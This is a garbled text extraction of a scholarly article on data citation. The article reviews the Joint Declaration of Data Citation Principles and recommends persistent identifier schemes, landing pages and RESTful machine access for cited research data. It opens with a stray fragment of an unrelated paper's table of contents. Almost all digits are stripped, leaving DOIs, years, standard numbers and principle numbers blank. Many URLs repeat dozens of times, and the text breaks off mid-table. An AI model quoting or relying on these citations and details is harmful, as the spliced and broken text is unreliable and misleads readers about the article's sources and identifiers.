measures collecting and preparing data for statistical analysis statistical analysis of focal measures results determining the steady-state truncation point analyzing the distributions of focal measures discussion conclusion references achieving human and machine accessibility of cited data in scholarly publications submitted december accepted february published may corresponding author tim clark, tim clark@harvard.edu academic editor harry hochheiser additional information and declarations can be found on page doi . /peerj-cs. distributed under creative commons public domain dedication open access achieving human and machine accessibility of cited data in scholarly publications joan starr , eleni castro , mercè crosas , michel dumontier , robert r. downs , ruth duerr , laurel l. haak , melissa haendel , ivan herman , simon hodson , joe hourclé , john ernest kratz , jennifer lin , lars holm nielsen , amy nurnberger , stefan proell , andreas rauber , simone sacchi , arthur smith , mike taylor and tim clark california digital library, oakland, ca, united states of america institute of quantitative social sciences, harvard university, cambridge, ma, united states of america stanford university school of medicine, stanford, ca, united states of america center for international earth science information network (ciesin), columbia university, palisades, ny, united states of america national snow and ice data center, boulder, co, united states of america orcid, inc., bethesda, md, united states of america oregon health and science university, portland, or, united states of america world wide web consortium (w c)/centrum wiskunde en informatica (cwi), amsterdam, netherlands icsu committee on data for science and technology (codata), paris, france solar data analysis center, nasa goddard space flight center, greenbelt, md, united states of america public library of science, san francisco, ca, united states of america european organization for nuclear research (cern), geneva, switzerland columbia university libraries/information services, new york, ny, united states of america sba research, vienna, austria institute of software technology and interactive systems, vienna university of technology/tu wien, austria american physical society, ridge, ny, united states of america elsevier, oxford, united kingdom harvard medical school, boston, ma, united states of america abstract reproducibility and reusability of research results is an important concern in scien- tific communication and science policy. a foundational element of reproducibility and reusability is the open and persistently available presentation of research data. however, many common approaches for primary data publication in use today do not achieve sufficient long-term robustness, openness, accessibility or uniformity. nor do they permit comprehensive exploitation by modern web technologies. this has led to several authoritative studies recommending uniform direct citation of data archived in persistent repositories. data are to be considered as first-class schol- arly objects, and treated similarly in many ways to cited and archived scientific and scholarly literature. here we briefly review the most current and widely agreed set of principle-based recommendations for scholarly data citation, the joint declaration of data citation principles (jddcp). we then present a framework for operationalizing the jddcp; and a set of initial recommendations on identifier schemes, identifier how to cite this article starr et al. ( ), achieving human and machine accessibility of cited data in scholarly publications. peerj comput. sci. :e ; doi . /peerj-cs. mailto:tim_clark@harvard.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/publicdomain/zero/ . / http://creativecommons.org/publicdomain/zero/ . / http://creativecommons.org/publicdomain/zero/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. resolution behavior, required metadata elements, and best practices for realizing programmatic machine actionability of cited data. the main target audience for the common implementation guidelines in this article consists of publishers, scholarly organizations, and persistent data repositories, including technical staff members in these organizations. but ordinary researchers can also benefit from these recommen- dations. the guidance provided here is intended to help achieve widespread, uniform human and machine accessibility of deposited data, in support of significantly im- proved verification, validation, reproducibility and re-use of scholarly/scientific data. subjects human–computer interaction, data science, digital libraries, world wide web and web science keywords data citation, machine accessibility, data archiving, data accessibility introduction background an underlying requirement for verification, reproducibility, and reusability of scholarship is the accurate, open, robust, and uniform presentation of research data. this should be an integral part of the scholarly publication process. however, alsheikh-ali et al. ( ) robust citation of archived methods and materials—particularly highly variable materials such as cell lines, engineered animal models, etc.—and software—are important questions not dealt with here. see vasilevsky et al. ( ) for an excellent discussion of this topic for biological reagents. found that a large proportion of research articles in high-impact journals either weren’t subject to or didn’t adhere to any data availability policies at all. we note as well that such policies are not currently standardized across journals, nor are they typically optimized for data reuse. this finding reinforces significant concerns recently expressed in the scientific literature about reproducibility and whether many false positives are being reported as fact (colquhoun, ; rekdal, ; begley & ellis, ; prinz, schlange & asadullah, ; greenberg, ; ioannidis, ). data transparency and open presentation, while central notions of the scientific method along with their complement, reproducibility, have met increasing challenges as dataset sizes grow far beyond the capacity of printed tables in articles. an extreme example is the case of dna sequencing data. this was one of the first classes of data, along with crystallographic data, for which academic publishers began to require database accession numbers as a condition of publishing, as early as the ’s. at that time sequence data could actually still be published as text in journal articles. the atlas of protein sequence and structure, published from to , was the original form in which protein sequence data was compiled: a book, which could be cited (strasser, ). today the data volumes involved are absurdly large (salzberg & pop, ; shendure & ji, ; stein, ). similar transitions from printed tabular data to digitized data on the web have taken place across disciplines. reports from leading scholarly organizations have now recommended a uniform approach to treating research data as first-class research objects, similarly to the way textual publications are archived, indexed, and cited (codata-icsti task group , ; altman & king, ; uhlir, ; ball & duke, ). uniform citation of robustly archived, starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. described, and identified data in persistent digital repositories is proposed as an important step towards significantly improving the discoverability, documentation, validation, reproducibility, and reuse of scholarly data (codata-icsti task group , ; altman & king, ; uhlir, ; ball & duke, ; goodman et al., ; borgman, ; parsons, duerr & minster, ). the joint declaration of data citation principles (jddcp) (data citation synthesis group, ) is a set of top-level guidelines developed by several stakeholder organizations as a formal synthesis of current best-practice recommendations for common approaches to data citation. it is based on significant study by participating groups and independent scholars. the work of this group was hosted by the force (http://force .org) individuals representing the following organizations participated in the jddcp development effort: biomed central; california digital library; codata-icsti task group on data citation standards and practices; columbia university; creative commons; datacite; digital science; elsevier; european molecular biology laboratories/european bioinformatics institute; european organization for nuclear research (cern); federation of earth science information partners (esip); force .org; harvard institute for quantitative social sciences; icsu world data system; international as- sociation of stm publishers; library of congress (us); massachusetts general hospital; mit libraries; nasa solar data analysis center; the national academies (us); openaire; rensselaer polytechnic institute; research data alliance; science exchange; national snow and ice data center (us); natural environment research council (uk); national academy of sciences (us); sba research (at); national information standards organization (us); university of california, san diego; university of leuven/ku leuven (nl); university of oxford; vu university amsterdam; world wide web consortium (digital publishing activity). see https://www.force .org/ datacitation/workinggroup for details. community, an open forum for discussion and action on important issues related to the future of research communication and e-scholarship. the jddcp is the latest development in a collective process, reaching back to at least , to raise the importance of data as an independent scholarly product and to make data transparently available for verification and reproducibility (altman & crosas, ). the purpose of this document is to outline a set of common guidelines to operationalize jddcp-compliant data citation, archiving, and programmatic machine accessibility in a way that is as uniform as possible across conforming repositories and associated data citations. the recommendations outlined here were developed as part of a community process by participants representing a wide variety of scholarly organizations, hosted by the force data citation implementation group (dcig) (https://www.force .org/ datacitationimplementation). this work was conducted over a period of approximately one year beginning in early as a follow-on activity to the completed jddcp. why cite data? data citation is intended to help guard the integrity of scholarly conclusions and provides a basis for integrating exponentially growing datasets into new forms of scholarly publishing. both of these goals require the systematic availability of primary data in both machine- and human-tractable forms for re-use. a systematic review of current approaches is provided in codata-icsti task group ( ). three common practices in academic publishing today block the systematic reuse of data. the first is the citation of primary research data in footnotes, typically either of the form, “data is available from the authors upon request”, or “data is to be found on the authors’ laboratory website, http://example.com”. the second is publication of datasets as “supplementary file” or “supplementary data” pdfs where data is given in widely varying formats, often as graphical tables, and which in the best case must be laboriously screen-scraped for re-use. the third is simply failure in one way or another to make the data available at all. integrity of conclusions (and assertions generally) can be guarded by tying individual assertions in text to the data supporting them. this is done already, after a fashion, for image data in molecular biology publications where assertions based on primary data contained in images typically directly cite a supporting figure within the text starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://dx.doi.org/ . /peerj-cs. containing the image. several publishers (e.g., plos, nature publications, and faculty of ) already partner with data archives such as figshare (http://figshare.com), dryad (http://datadryad.org/), dataverse (http://dataverse.org/), and others to archive images and other research data. citing data also helps to establish the value of the data’s contribution to research. moving to a cross-discipline standard for acknowledging the data allows researchers to justify continued funding for their data collection efforts (uhlir, ; codata-icsti task group , ). well defined standards allow bibliometric tools to find unanticipated uses of the data. current analysis of data use is a laborious process and rarely performed for disciplines outside of the disciplines considered the data’s core audience (accomazzi et al., ). the eight core principles of data citation the eight principles below have been endorsed by scholarly societies, publishers and other institutions. such a wide endorsement by influential groups reflects, in our view, these organizations include the american physical society, association of research libraries, biomed cen- tral, codata, crossref, datacite, dataone, data registration agency for social and economic data, elixir, elsevier, european molecular biology laboratories/european bioinformatics institute, leibniz institute for the social sciences, inter-university consortium for political and social research, international association of stm publishers, international union of biochemistry and molecular biology, international union of crystallography, international union of geodesy and geophysics, national information standards organization (us), nature publishing group, openaire, plos (public library of science), research data alliance, royal society of chemistry, swiss institute of bioinformatics, cambridge crystallographic data centre, thomson reuters, and the university of california curation center (california digital library). the meticulous work involved in preparing the key supporting studies (by codata, the national academies, and others (codata-icsti task group , ; uhlir, ; ball & duke, ; altman & king, ) and in harmonizing the principles; and supports the validity of these principles as foundational requirements for improving the scholarly publication ecosystem. • principle —importance: “data should be considered legitimate, citable products of research. data citations should be accorded the same importance in the scholarly record as citations of other research objects, such as publications.” • principle —credit and attribution: “data citations should facilitate giving scholarly credit and normative and legal attribution to all contributors to the data, recognizing that a single style or mechanism of attribution may not be applicable to all data.” • principle —evidence: “in scholarly literature, whenever and wherever a claim relies upon data, the corresponding data should be cited.” • principle —unique identification: “a data citation should include a persistent method for identification that is machine actionable, globally unique, and widely used by a community.” • principle —access: “data citations should facilitate access to the data themselves and to such associated metadata, documentation, code, and other materials, as are necessary for both humans and machines to make informed use of the referenced data.” • principle —persistence: “unique identifiers, and metadata describing the data, and its disposition, should persist—even beyond the lifespan of the data they describe.” • principle —specificity and verifiability: “data citations should facilitate identifica- tion of, access to, and verification of the specific data that support a claim. citations or citation metadata should include information about provenance and fixity sufficient to facilitate verifying that the specific time slice, version and/or granular portion of data retrieved subsequently is the same as was originally cited.” starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dx.doi.org/ . /peerj-cs. • principle —interoperability and flexibility: “citation methods should be sufficiently flexible to accommodate the variant practices among communities, but should not differ so much that they compromise interoperability of data citation practices across communities.” these principles are meant to be adopted at an institutional or discipline-wide scale. the main target audience for the common implementation guidelines in this article consists of publishers, scholarly organizations, and persistent data repositories. individual researchers are not meant to set up their own data archives. in fact this is contrary to one goal of data citation as we see it—which is to get away from inherently unstable citations via researcher footnotes indicating data availability at some intermittently supported laboratory website. however individual researchers can contribute to and benefit from adoption of these principles by ensuring that primary research data is prepared for archival deposition at or before publication. we also note that often a researcher will want to go back to earlier primary data from their own lab—robust archiving positively ensures it will remain available for their own use in future, whatever the vicissitudes of local storage and lab personnel turnover. implementation questions arising from the jddcp the jddcp were presented by their authors as principles. implementation questions were left unaddressed. this was meant to keep the focus on harmonizing top-level and basically goal-oriented recommendations without incurring implementation-level distractions. therefore we organized a follow-on activity to produce a set of implementation guidelines intended to promote rapid, successful, and uniform jddcp adoption. we began by seeking to understand just what questions would arise naturally to an organization that wished to implement the jddcp. we then grouped the questions into four topic areas, to be addressed by individuals with special expertise in each area. . document data model—how should publishers adapt their document data models to support direct citation of data? . publishing workflows—how should publishers change their editorial workflows to support data citation? what do publisher data deposition and citation workflows look like where data is being cited today, such as in nature scientific data or gigascience? . common repository application program interfaces (apis)—are there any ap- proaches that can provide standard programmatic access to data repositories for data deposition, search and retrieval? . identifiers, metadata, and machine accessibility—what identifier schemes, identifier resolution patterns, standard metadata, and recommended machine programmatic accessibility patterns are recommended for directly cited data? the document data model group noted that publishers use a variety of xml schemas (bray et al., ; gao, sperberg-mcqueen & thompson, ; peterson et al., ) to model scholarly articles. however, there is a relevant national information standards starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. organization (niso) specification, niso z . - , which is increasingly used by publishers, and is the archival form for biomedical publications in pubmed central. this niso z . - is derived from the former “nlm-dtd” model originally developed by the us national library of medicine. group therefore developed a proposal for revision of the niso journal article tag suite to support direct data citation. niso-jats version . d (national center for biotechnology information, ), a revision based on this proposal, was released on december , , by the jats standing committee, and is considered a stable release, although it is not yet an official revision of the niso z . - standard. the publishing workflows group met jointly with the research data alliance’s publishing data workflows working group to collect and document exemplar publishing workflows. an article on this topic is in preparation, reviewing basic requirements and exemplar workflows from nature scientific data, gigascience (biomed central), f research, and geoscience data journal (wiley). the common repository apis group is currently planning a pilot activity for a common api model for data repositories. recommendations will be published at the conclusion of the pilot. this work is being undertaken jointly with the elixir (http:// www.elixir-europe.org/) fairport working group. the identifiers, metadata, and machine accessibility group’s recommendations are presented in the remainder of this article. these recommendations cover: • definition of machine accessibility; • identifiers and identifier schemes; • landing pages; • minimum acceptable information on landing pages; • best practices for dataset description; and • recommended data access methods. recommendations for achieving machine accessibility what is machine accessibility? machine accessibility of cited data, in the context of this document and the jddcp, means access by well-documented web services (booth et al., )—preferably restful web services (fielding, ; fielding & taylor, ; richardson & ruby, ) to data and metadata stored in a robust repository, independently of integrated browser access by humans. web services are methods of program-to-program communication using web protocols. the world wide web consortium (w c, http://www.w .org) defines them as “software system[s] designed to support interoperable machine-to-machine interaction over a network” (haas & brown, ). web services are always “on” and function essentially as utilities, providing services such as computation and data lookup, at web service endpoints. these are well-known web addresses, or uniform resource identifiers (uris) (berners-lee, fielding & masinter, ; jacobs & walsh, ). uris are very similar in concept to the more widely understood uniform resource locators (url, or “web address”), but uris do not specify the location of an object or service—they only identify it. uris specify abstract resources on the web. the associated server is responsible for resolving a uri to a specific physical resource—if the resource is resolvable. (uris may also be used to identify physical things such as books in a library, which are not directly resolvable resources on the web.) starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.elixir-europe.org/ http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://dx.doi.org/ . /peerj-cs. restful web services follow the rest (representational state transfer) architecture developed by fielding and others (fielding, ). they support a standard set of operations such as “get” (retrieve), “post” (create), and “put” (create or update) and are highly useful in building hypermedia applications by combining services from many programs distributed on various web servers. machine accessibility and particularly restful web service accessibility is highly desirable because it enables construction of “lego block” style programs built up from various service calls distributed across the web, which need not be replicated locally. restful web services are recommended over the other major web service approach, soap interfaces (gudgin et al., ), due to our focus on the documents being served and their content. rest also allows multiple data formats such as json (javascript object notation) (ecma, ), and provides better support for mobile applications (e.g., caching, reduced bandwidth, etc.). clearly, “machine accessibility” is also an underlying prerequisite to human accessibility, as browser (client) access to remote data is always mediated by machine-to-machine com- munication. but for flexibility in construction of new programs and services, it needs to be independently available apart from access to data generated from the direct browser calls. unique identification unique identification in a manner that is machine-resolvable on the web and demon- strates a long-term commitment to persistence is fundamental to providing access to cited data and its associated metadata. there are several identifier schemes on the web that meet these two criteria. the best identifiers for data citation in a particular community of practice will be those that meet these criteria and are widely used in that community. our general recommendation, based on the jddcp, is to use any currently available identifier scheme that is machine actionable, globally unique, and widely (and currently) used by a community, and that has demonstrated a long-term commitment to persistence. best practice, given the preceding, is to choose a scheme that is also cross-discipline. machine actionable in this context means resolvable on the web by web services. there are basically two kinds of identifier schemes available: (a) the native http and https schemes where uris are the identifiers and address resolution occurs natively; and (b) schemes requiring a resolving authority, like digital object identifiers (dois). resolving authorities reside at well-known web addresses. they issue and keep track of identifiers in their scheme and resolve them by translating them to uris which are then natively resolved by the web. for example, the doi . /rsos. when appended to the doi resolver at http://doi.org, resolves to the uri http://rsos.royalsocietypublishing. org/content/ / / . similarly, the biosample identifier sameg , when ap- pended as (“biosample/sameg ”) to the identifiers.org resolver at http://identifiers. org, resolves to the landing page www.ebi.ac.uk/biosamples/group/sameg . however resolved, a cited identifier should continue to resolve to an intermediary landing page (see below) even if the underlying data has been de-accessioned or is otherwise unavailable. starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://doi.org http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://rsos.royalsocietypublishing.org/content/ / / http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://www.ebi.ac.uk/biosamples/group/sameg http://dx.doi.org/ . /peerj-cs. table examples of identifier schemes meeting jddcp criteria. identifier scheme full name authority resolution uri datacite doi (as uri) datacite-assigned digital object identifier datacite http://dx.doi.org crossref doi (as uri) crossref-assigned digital object identifier crossref http://dx.doi.org identifiers.org uri identifiers.org-assigned uniform resource identifier identifiers.org http://identifiers.org https uri http or https uniform resource identifier domain name owner n/a purl persistent uniform resource locator online computer library center (oclc) http://purl.org handle (hdl) handle system hdl corporation for national research initiatives (cnri) http://handle.net ark archival resource key name assigning or mapping authorities (various)a http://n t.net; name mapping authorities nbn national bibliographic number various various notes. a registries maintained at california digital library, bibliothèque national de france and national library of medicine. by a commitment to persistence, we mean that (a) if a resolving authority is required that authority has demonstrated a reasonable chance to be present and functional in the future; (b) the owner of the domain or the resolving authority has made a credible commitment to ensure that its identifiers will always resolve. a useful survey of persistent identifier schemes appears in hilse & kothe ( ). examples of identifier schemes meeting jddcp criteria for robustly accessible data citation are shown in table and described below. this is not a comprehensive list and the criteria above should govern. table summarizes the approaches to achieving and enforcing persistence, and actions on object (data) removal from the archive, of each of the schemes. the subsections below briefly describe the exemplar identifier schemes shown in tables and . digital object identifiers (dois) digital object identifiers are an identification system originally developed by trade associations in the publishing industry for digital content over the internet. they were developed in partnership with the corporation for national research initiatives (cnri), and built upon cnri’s handle system as an underlying network component. however, dois may identify digital objects of any type—certainly including data (international doi foundation, ). doi syntax is defined as a us national information standards organization standard, ansi/niso z . - . dois may be expressed as uris by prefixing the doi with a resolution address: http://dx.doi.org/<doi>. doi registration agencies provide services for registering dois along with descriptive metadata on the object being identified. the doi system proxy server allows programmatic access to doi name resolution using http (international doi foundation, ). datacite and crossref are the two doi registration agencies of special relevance to data citation. they provide services for registering and resolving identifiers for cited data. starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://dx.doi.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://identifiers.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://handle.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://dx.doi.org/ . /peerj-cs. table identifier scheme persistence and object removal behavior. identifier scheme achieving persistence enforcing persistence action on object removal datacite doi registration with contracta link checking datacite contacts owners; metadata should persist 